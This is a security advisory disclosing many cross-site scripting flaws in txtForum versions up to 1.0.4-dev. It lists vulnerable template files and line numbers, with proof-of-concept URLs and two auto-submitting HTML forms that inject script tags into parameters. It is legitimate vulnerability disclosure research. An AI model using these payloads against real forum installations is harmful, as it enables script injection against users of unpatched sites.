txtForum (http://sourceforge.net/projects/txtforum1)
Versions 1.0.4-dev and prior.
There are multiple cross-site scripting (XSS) vulnerabilities which can be verified by using the following
exploits (the user needs to be logged in). They are roughly sorted by entry points (i.e., the names of the
files that have to be navigated). The vulnerabilities were discovered under the assumption that
register_globals is on, and that magic_quotes_gpc is off.
skins/txtforum/under_topic.tpl, line 11
(included by index.php on line 99)
$prev: not initialized if the file "data/headers.txt" does not exist;
exploit in this case: analogous to line 123 (see below)
122:
$next: not initialized if the file "data/headers.txt" does not exist;
exploit in this case: analogous to line 123 (see below)
123:
$rand5: is never initialized
http://localhost/txtforum104/index.php?rand5="><script>alert('xss_string')</script>
skins/txtforum/topic_form.tpl, line 17
http://localhost/txtforum104/new_topic.php?r_username='><script>alert('xss_string')</script>
skins/txtforum/topic_form.tpl, line 18
http://localhost/txtforum104/new_topic.php?r_loc='><script>alert('xss_string')</script>
skins/txtforum/editprofile.tpl, line 22
http://localhost/txtforum104/profile.php?mode=editprofile&r_icq="><script>alert('xss_string')</script>
skins/txtforum/editprofile.tpl, line 27
http://localhost/txtforum104/profile.php?mode=editprofile&r_yahoo="><script>alert('xss_string')</script>
skins/txtforum/editprofile.tpl, line 31
http://localhost/txtforum104/profile.php?mode=editprofile&r_aim="><script>alert('xss_string')</script>
skins/txtforum/editprofile.tpl, line 35
skins/txtforum/editprofile.tpl, line 65
$selected1: works if the user has set $r_hide_email == 0;
else: use vulnerability below (selected0)
http://localhost/txtforum104/profile.php?mode=editprofile&selected1="><script>alert('xss_string')</script>
skins/txtforum/editprofile.tpl, line 65
$selected0: works if the user has set $r_hide_email == 1
http://localhost/txtforum104/profile.php?mode=editprofile&selected0="><script>alert('xss_string')</script>
skins/txtforum/editprofile.tpl, line 69
$signature_selected1: works if the user has set $show_sig == 0;
else: use vulnerability below ($signature_selected0)
skins/txtforum/reply_form.tpl, line 31
http://localhost/txtforum104/reply.php?quote=</textarea><script>alert('xss_string')</script>
skins/txtforum/reply_form.tpl, line 43
http://localhost/txtforum104/reply.php?tid="><script>alert('xss_string')</script>
skins/txtforum/next_preview.tpl, line 6
http://localhost/txtforum104/view_topic.php?page=27&tid='><script>alert('xss_string')</script>
view_topic.php, line 12
$tid is echoed at several places:
http://localhost/txtforum104/view_topic.php?print_adminJS=1&tid="><script>alert('xss_string')</script>
common.php, line 15
parameter of admin_msg is echoed;
<form action='http://localhost/txtforum104/view_topic.php?sticked=<script>alert("xss_string")</script>'
method="post">
<input type="text" name="where" value="sticky"/>
<input type="submit">
</form>
<script type="text/javascript">
document.forms[0].submit();
</script>
<form action='http://localhost/txtforum104/view_topic.php' method="post">
<input type="text" name="where" value="deleteme"/>
<input type="text" name="mid" value="<script>alert('xss_string')</script>"/>
<input type="submit">
</form>
<script type="text/javascript">
document.forms[0].submit();
</script>
view_topic.php, line 244
$next, via $tid:
http://localhost/txtforum104/view_topic.php?page=-1&tid=xss_string
view_topic.php, line 271
http://localhost/txtforum104/view_topic.php?tid=xss_string
view_topic.php, line 272:
$tid: as before
view_topic.php, line 280
$tid: as before
There is no solution to these issues yet.
Timeline:
February 23, 2006:
Vulnerabilities indicated via confy at users dot sourceforge dot net.
Provided detailed report of the vulnerabilities after the author's response.
No fixes are planned.
March 9, 2006:
Advisory submission.
http://www.seclab.tuwien.ac.at/advisories/TUVSA-0603-003.txt
Nenad Jovanovic
Secure Systems Lab
Technical University of Vienna
www.seclab.tuwien.ac.at